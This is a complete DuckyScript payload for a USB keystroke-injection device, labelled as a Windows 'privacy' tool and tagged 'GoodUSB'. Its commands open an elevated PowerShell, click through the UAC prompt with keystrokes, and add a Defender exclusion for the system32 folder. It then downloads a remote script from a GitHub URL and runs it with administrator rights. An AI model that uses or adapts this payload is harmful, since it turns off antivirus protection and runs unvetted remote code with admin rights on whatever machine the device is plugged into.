REM Title: Privacy_Windows
REM Author: galli3r
REM Description: Want to feel the privacy on Windows?
REM Target: Windows
REM Version: 1.0
REM Category: GoodUSB
REM ==================================================
REM = Start Program                                  =
REM ==================================================
DELAY 500
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
CTRL-SHIFT ENTER
DELAY 1500
SHIFT TAB
DELAY 500
ENTER
DELAY 1500
STRING Add-MpPreference -ExclusionPath C:\Windows\system32
ENTER
DELAY 500
STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/galli3r/files/blob/main/privacy.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
ENTER
